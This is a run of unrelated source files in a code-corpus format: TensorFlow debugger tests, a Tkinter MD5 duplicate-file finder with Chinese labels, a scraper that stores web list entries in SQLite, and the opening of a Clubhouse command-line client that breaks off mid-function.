sess.run(x.initializer)
unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)
v = math_ops.add(unique_x, unique_x, name=v_name)
w = math_ops.add(indices, indices, name=w_name)
y = math_ops.add(w, w, name=y_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
# Watch only the first output slot of u, even though it has two output
# slots.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, w_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, y_name, 0, debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run([v, y], options=run_options, run_metadata=run_metadata)
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=True)
self.assertAllClose([1, 3, 7],
dump.get_tensors(u_name, 0, "DebugIdentity")[0])
def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
"""Test watching output slots not attached to any outgoing edges."""
with session.Session(config=no_rewrite_session_config()) as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
u = constant_op.constant(u_init_val, shape=[2, 2], name="u")
# Create a control edge from a node with an output: From u to z.
# Node u will get executed only because of the control edge. The output
# tensor u:0 is not attached to any outgoing edge in the graph. This test
# checks that the debugger can watch such a tensor.
with ops.control_dependencies([u]):
z = control_flow_ops.no_op(name="z")
_, dump = self._debug_run_and_get_dump(sess, z)
# Assert that the DebugIdentity watch on u works properly.
self.assertEqual(1, len(dump.dumped_tensor_data))
datum = dump.dumped_tensor_data[0]
self.assertEqual("u", datum.node_name)
self.assertEqual(0, datum.output_slot)
self.assertEqual("DebugIdentity", datum.debug_op)
self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
"""Watch output slots on Variable-updating ops, with no emitted edges."""
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="gdo/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="gdo/v")
w = math_ops.multiply(u, v, name="gdo/w")
# gdo stands for GradientDescentOptimizer.
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(
w, name="gdo/train")
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(sess, train_op)
update_u_data = dump.watch_key_to_data(
"gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_u_data))
# Gradient descent on u: w = u * v, so dw / du = v.
# Updated value of u should be:
# 10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
self.assertAllClose(8.0, update_u_data[0].get_tensor())
update_v_data = dump.watch_key_to_data(
"gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_v_data))
# Gradient descent on u: w = u * v, so dw / dv = u.
# Updated value of u should be:
# 20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
self.assertAllClose(19.0, update_v_data[0].get_tensor())
# Verify that the Variables u and v are updated properly.
self.assertAllClose(8.0, sess.run(u))
self.assertAllClose(19.0, sess.run(v))
def testAllowsWatchingUnconnectedOutputTensor(self):
"""Watch an output slot not emitting any edges.
(Not even control edges from the node.)
"""
with session.Session() as sess:
x_init = constant_op.constant([2, 2, 3, 5, 5])
x = variables.Variable(x_init, name="unconnected/x")
# The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
# graph. Let the debugger watch the unused slot 1.
unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")
x.initializer.run()
# Verify that only slot 0 of unique_x has recipients, while slot 1 of the
# same node does not have recipients.
unique_x_slot_0_recipients = []
unique_x_slot_1_recipients = []
for op in sess.graph.get_operations():
for inp in op.inputs:
if inp.name == "unconnected/unique_x:0":
unique_x_slot_0_recipients.append(op.name)
elif inp.name == "unconnected/unique_x:1":
unique_x_slot_1_recipients.append(op.name)
self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
self.assertEqual([], unique_x_slot_1_recipients)
y_result, dump = self._debug_run_and_get_dump(sess, y)
self.assertAllClose([2, 4, 7], y_result)
# Assert that the connected slot (slot 0) is dumped properly.
unique_x_slot_0_dumps = dump.watch_key_to_data(
"unconnected/unique_x:0:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_0_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_0_dumps[0].node_name)
self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())
# Assert that the unconnected slot (slot 1) is dumped properly.
unique_x_slot_1_dumps = dump.watch_key_to_data(
"unconnected/unique_x:1:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_1_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_1_dumps[0].node_name)
self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
self.assertAllClose([0, 0, 1, 2, 2],
unique_x_slot_1_dumps[0].get_tensor())
def testSuccessiveDebuggingRunsIncreasesCounters(self):
"""Test repeated Session.run() calls with debugger increments counters."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
x = array_ops.transpose(ph, name="mismatch/x")
y = array_ops.squeeze(ph, name="mismatch/y")
_, dump1 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
self.assertEqual(1, dump1.core_metadata.global_step)
self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
self.assertEqual(0, dump1.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump1.core_metadata.input_names)
self.assertEqual([x.name], dump1.core_metadata.output_names)
self.assertEqual([], dump1.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
# Calling run() with the same feed, same output and same debug watch
# options should increment both session_run_index and
# executor_step_index.
_, dump2 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
self.assertEqual(2, dump2.core_metadata.global_step)
self.assertEqual(dump1.core_metadata.session_run_index + 1,
dump2.core_metadata.session_run_index)
self.assertEqual(dump1.core_metadata.executor_step_index + 1,
dump2.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump2.core_metadata.input_names)
self.assertEqual([x.name], dump2.core_metadata.output_names)
self.assertEqual([], dump2.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)
# Calling run() with a different output should increment
# session_run_index, but not executor_step_index.
_, dump3 = self._debug_run_and_get_dump(
sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
self.assertEqual(3, dump3.core_metadata.global_step)
self.assertEqual(dump2.core_metadata.session_run_index + 1,
dump3.core_metadata.session_run_index)
self.assertEqual(0, dump3.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump3.core_metadata.input_names)
self.assertEqual([y.name], dump3.core_metadata.output_names)
self.assertEqual([], dump3.core_metadata.target_nodes)
def testDebuggingDuringOpError(self):
"""Test the debug tensor dumping when error occurs in graph runtime."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
x = array_ops.transpose(ph, name="mismatch/x")
m = constant_op.constant(
np.array(
[[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
y = math_ops.matmul(m, x, name="mismatch/y")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.OpError):
sess.run(y,
options=run_options,
feed_dict={ph: np.array([[-3.0], [0.0]])})
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
self.assertEqual([ph.name], dump.core_metadata.input_names)
self.assertEqual([y.name], dump.core_metadata.output_names)
self.assertEqual([], dump.core_metadata.target_nodes)
# Despite the fact that the run() call errored out and partition_graphs
# are not available via run_metadata, the partition graphs should still
# have been loaded from the dump directory.
self.assertTrue(dump.loaded_partition_graphs())
m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
self.assertEqual(1, len(m_dumps))
self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())
x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
self.assertEqual(1, len(x_dumps))
self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(
[
np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
-np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
],
dtype=np.float32,
name="numeric_summary/a")
b = variables.Variable(
[0.0] * 18, dtype=np.float32, name="numeric_summary/b")
c = math_ops.add(a, b, name="numeric_summary/c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(
sess, c, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
self.assertAllClose([[
1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
8.97959184, 1.0, 1.0, 18.0
]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[42], dtype=np.float32, name="numeric_summary_uninit/a")
_, dump = self._debug_run_and_get_dump(
sess, a.initializer, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
# DebugNumericSummary output should reflect the uninitialized state of
# the watched tensor.
numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
"DebugNumericSummary")[0]
self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
numeric_summary[0:8])
# Check dtype (index 12), ndims (index 13) and dimension sizes (index
# 14+).
self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])
self.assertTrue(np.isinf(numeric_summary[8]))
self.assertGreater(numeric_summary[8], 0.0)
self.assertTrue(np.isinf(numeric_summary[9]))
self.assertLess(numeric_summary[9], 0.0)
self.assertTrue(np.isnan(numeric_summary[10]))
self.assertTrue(np.isnan(numeric_summary[11]))
def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
with session.Session() as sess:
a = variables.Variable("1", name="a")
b = variables.Variable("3", name="b")
c = variables.Variable("2", name="c")
d = math_ops.add(a, b, name="d")
e = math_ops.add(d, c, name="e")
n = parsing_ops.string_to_number(e, name="n")
m = math_ops.add(n, n, name="m")
sess.run(variables.global_variables_initializer())
# Using DebugNumericSummary on sess.run(m) with the default
# tolerate_debug_op_creation_failures=False should error out due to the
# presence of string-dtype Tensors in the graph.
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.FailedPreconditionError):
sess.run(m, options=run_options, run_metadata=run_metadata)
# Using tolerate_debug_op_creation_failures=True should get rid of the
# error.
m_result, dump = self._debug_run_and_get_dump(
sess, m, debug_ops=["DebugNumericSummary"],
tolerate_debug_op_creation_failures=True)
self.assertEqual(264, m_result)
# The integer-dtype Tensors in the graph should have been dumped
# properly.
self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_.:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"2 attribute key\(s\) were not valid for debug node "
r"__dbg_.:0_0_DebugNumericSummary:"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_.:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
validate=False)
self.assertEqual(2, dump.size)
self.assertAllClose([[
1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("x", 0, "DebugNumericSummary"))
self.assertAllClose([[
1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("y", 0, "DebugNumericSummary"))
# Another run with the default mute_if_healthy (false) value should
# dump all the tensors.
shutil.rmtree(self._dump_root)
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary()"])
self.assertEqual(8, dump.size)
def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
with session.Session() as sess:
a = variables.Variable([10.0, 10.0], name="a")
b = variables.Variable([10.0, 2.0], name="b")
x = math_ops.add(a, b, name="x") # [20.0, 12.0]
y = math_ops.divide(x, b, name="y") # [2.0, 6.0]
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=[
"DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
validate=False)
self.assertEqual(1, dump.size)
self.assertAllClose([[
1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
def testDebugQueueOpsDoesNotoErrorOut(self):
with session.Session() as sess:
q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")
_, dump = self._debug_run_and_get_dump(sess, q_init)
self.assertTrue(dump.loaded_partition_graphs())
fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
self.assertIsInstance(fifo_queue_tensor,
debug_data.InconvertibleTensorProto)
self.assertTrue(fifo_queue_tensor.initialized)
self.assertAllClose(
[101.0, 202.0, 303.0],
dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
def testLookUpNodePythonTracebackWorks(self):
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="traceback/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="traceback/v")
w = math_ops.multiply(u, v, name="traceback/w")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, w)
# Prior to setting the Python graph, attempts to do traceback lookup
# should lead to exceptions.
with self.assertRaisesRegexp(
LookupError, "Python graph is not available for traceback lookup"):
dump.node_traceback("traceback/w")
dump.set_python_graph(sess.graph)
# After setting the Python graph, attempts to look up nonexistent nodes
# should lead to exceptions.
with self.assertRaisesRegexp(KeyError,
r"Cannot find node \"foo\" in Python graph"):
dump.node_traceback("foo")
# Lookup should work with node name input.
traceback = dump.node_traceback("traceback/w")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
# Lookup should also work with tensor name input.
traceback = dump.node_traceback("traceback/w:0")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
"""Test for debugging concurrent Session.run() calls."""
def _get_concurrent_debug_urls(self):
"""Abstract method to generate debug URLs for concurrent debugged runs."""
raise NotImplementedError(
"_get_concurrent_debug_urls is not implemented in the base test class")
def testDebugConcurrentVariableUpdates(self):
if test.is_gpu_available():
self.skipTest("No testing concurrent runs on a single GPU.")
with session.Session() as sess:
v = variables.Variable(30.0, name="v")
constants = []
for i in xrange(self._num_concurrent_runs):
constants.append(constant_op.constant(1.0, name="c%d" % i))
incs = [
state_ops.assign_add(
v, c, use_locking=True, name=("inc%d" % i))
for (i, c) in enumerate(constants)
]
sess.run(v.initializer)
concurrent_debug_urls = self._get_concurrent_debug_urls()
def inc_job(index):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
for _ in xrange(100):
sess.run(incs[index], options=run_options)
inc_threads = []
for index in xrange(self._num_concurrent_runs):
inc_thread = threading.Thread(target=functools.partial(inc_job, index))
inc_thread.start()
inc_threads.append(inc_thread)
for inc_thread in inc_threads:
inc_thread.join()
self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
sess.run(v))
all_session_run_indices = []
for index in xrange(self._num_concurrent_runs):
dump = debug_data.DebugDumpDir(self._dump_roots[index])
self.assertTrue(dump.loaded_partition_graphs())
v_data = dump.get_tensors("v", 0, "DebugIdentity")
self.assertEqual(100, len(v_data))
# Examine all the core metadata files
core_metadata_files = glob.glob(
os.path.join(self._dump_roots[index], "_tfdbg_core*"))
timestamps = []
session_run_indices = []
executor_step_indices = []
for core_metadata_file in core_metadata_files:
with open(core_metadata_file, "rb") as f:
event = event_pb2.Event()
event.ParseFromString(f.read())
core_metadata = (
debug_data.extract_core_metadata_from_event_proto(event))
timestamps.append(event.wall_time)
session_run_indices.append(core_metadata.session_run_index)
executor_step_indices.append(core_metadata.executor_step_index)
all_session_run_indices.extend(session_run_indices)
# Assert that executor_step_index increases by one at a time.
executor_step_indices = zip(timestamps, executor_step_indices)
executor_step_indices = sorted(
executor_step_indices, key=lambda x: x[0])
for i in xrange(len(executor_step_indices) - 1):
self.assertEquals(executor_step_indices[i][1] + 1,
executor_step_indices[i + 1][1])
# Assert that session_run_index increase monotonically.
session_run_indices = zip(timestamps, session_run_indices)
session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
for i in xrange(len(session_run_indices) - 1):
self.assertGreater(session_run_indices[i + 1][1],
session_run_indices[i][1])
# Assert that the session_run_indices from the concurrent run() calls are
# all unique.
self.assertEqual(len(all_session_run_indices),
len(set(all_session_run_indices)))
if __name__ == "__main__":
googletest.main()
|
main.py | import os
import shutil
from time import sleep
import threading
import tkinter as tk
from tkinter import filedialog
import hashlib
print('简易文件比对TOOL=====V0.2')
work_dir = '暂未设定'
lineNub = 10
filename = 0
nowline = int(0)
filelist = []
root = tk.Tk()
root.title('简易文件比对V0.1===真的假的鸭?')
root.geometry('550x100')
lineNub_show = tk.StringVar()
lineNub_show.set(lineNub)
work_dir_show = tk.StringVar()
work_dir_show.set(work_dir)
def CpToNewMkdir(md5, file2):
shutil.copy(file2, os.path.join(work_dir, md5))
filelist.append(file2)
def getFileMd5(filename):
thisfile = open(filename, 'rb')
filemd5 = hashlib.md5()
filemd5.update(thisfile.read())
hash = filemd5.hexdigest()
thisfile.close()
return str(hash).upper()
def Compared_MD5(md5, filepath):
for name in os.listdir(work_dir):
i = os.path.join(work_dir, name)
if os.path.isfile(i):
if i != filepath:
if getFileMd5(i) == md5:
if md5 not in os.listdir(work_dir):
os.mkdir(os.path.join(work_dir, md5))
CpToNewMkdir(md5, i)
else:
pass
else:
pass
else:
pass
def getDir():
global work_dir
work_dir = filedialog.askdirectory()
work_dir_show.set(work_dir)
def find_run(md5, filepath):
global nowline
while nowline > int(lineNub):
sleep(0.05)
nowline = nowline + 1
now_line = threading.Thread(target=Compared_MD5, args=(md5, filepath))
now_line.run()
def main():
global filename
for name in os.listdir(work_dir):
file_absolute_path = os.path.join(work_dir, name)
if os.path.isfile(file_absolute_path):
print(name)
filemd5 = getFileMd5(file_absolute_path)
find_run(filemd5, file_absolute_path)
else:
pass
er = tk.Tk()
er.geometry('700x500')
text = tk.Label(er, text='在指定文件夹下对比结束')
text.grid(row=0, column=0)
er.mainloop()
def del_aft_cp():
for filepath in filelist:
os.remove(filepath)
def mainrun():
main_run = threading.Thread(target=main)
main_run.start()
def set_lineNub():
global lineNub
lineNub = set_lineNub_entry.get()
lineNub_show.set(lineNub)
set_dir_bt = tk.Button(root, text='设置工作目录', command=getDir)
start_bt = tk.Button(root, text='开始对比', command=mainrun)
del_bt = tk.Button(root, text='重复文件移动至MD5命名的文件夹之后,从工作文件夹中删除', command=del_aft_cp)
work_dir_print = tk.Label(root, textvariable=work_dir_show)
set_lineNub_entry = tk.Entry(root)
set_lineNub_bt = tk.Button(root, text='设置最大比对线程数,默认10', command=set_lineNub)
lineNub_print = tk.Label(root, textvariable=lineNub_show)
set_dir_bt.grid(row=0, column=0)
work_dir_print.grid(row=0, column=1)
set_lineNub_bt.grid(row=1, column=0)
set_lineNub_entry.grid(row=1, column=1)
lineNub_print.grid(row=1, column=2)
start_bt.grid(row=2, column=0)
del_bt.grid(row=2, column=1)
root.mainloop()
# ==============================================================================================================
|
KoreaData.py | import sqlite3
import urllib2
import re
from threading import Thread
class Koreanlist:
def __init__(self, list_type, cursor):
self.list_type = list_type
self.webpage = ""
self.cursor = cursor
self.filename = list_type + ".txt"
def update(self):
self.cursor.execute("CREATE TABLE IF NOT EXISTS " + self.list_type + " (company)")
self.checkWebpage()
if self._webpageUpdated():
self._saveWebpage()
self._updateTable()
def checkWebpage(self):
if self.webpage == "":
self.webpage = self._html("http://" + self.list_type + ".tokyojon.com/")
def _html(self, url):
return urllib2.urlopen(url).read()
def _webpageUpdated(self):
return self.webpage is not self._savedPage()
def _saveWebpage(self):
with open(self.filename, 'w') as f:
f.write(self.webpage)
def _savedPage(self):
try:
with open(self.filename, 'r') as f:
return f.read()
except:
return ""
def _updateTable(self):
subjects = re.findall("ubject:[</span>]*([\w| |\-|\,]{6,})", self.webpage)
subject_tuples = [(self._prettyPrint(subject), ) for subject in subjects]
self.cursor.executemany("INSERT INTO " + self.list_type + "(company) VALUES (?)", subject_tuples)
def _prettyPrint(self, string):
return string.strip().lower()
class Greenlist(Koreanlist):
def __init__(self, cursor):
Koreanlist.__init__(self, "greenlist", cursor)
class Blacklist(Koreanlist):
def __init__(self, cursor):
Koreanlist.__init__(self, "blacklist", cursor)
def updateDatabase():
conn = sqlite3.connect("schools.db", check_same_thread=False)
cursor = conn.cursor()
lists = [Greenlist(cursor), Blacklist(cursor)]
_checkWebpages(lists)
_updateLists(lists)
conn.commit()
def _checkWebpages(lists):
threads = [_makeThread(l.checkWebpage(), ()) for l in lists]
_joinThreads(threads)
def _makeThread(function, arguments):
thread = Thread(target=function, args=arguments)
thread.start()
return thread
def _joinThreads(threads):
for thread in threads:
thread.join()
def _updateLists(lists):
for l in lists:
l.update()
|
cli.py | """
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
import sys
import time
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None,
agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
def write_config(user_id, user_token, user_device, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=20):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("topic")
table.add_column("speaker_count")
channels = client.get_channels()['channels']
i = 0
for channel in channels:
i += 1
if i > max_limit:
break
_option = ""
_option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
table.add_row(
str(_option),
str(channel['channel']),
str(channel['topic']),
str(int(channel['num_speakers'])),
)
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 20
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(
client, channel_name, user_id)
print(
"[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
time.sleep(3)
channel_name = sys.argv[1]
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(
f"[-] Error while joining the channel ({channel_info['error_message']})")
return
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(user['user_id']),
str(user['name']),
str(user['username']),
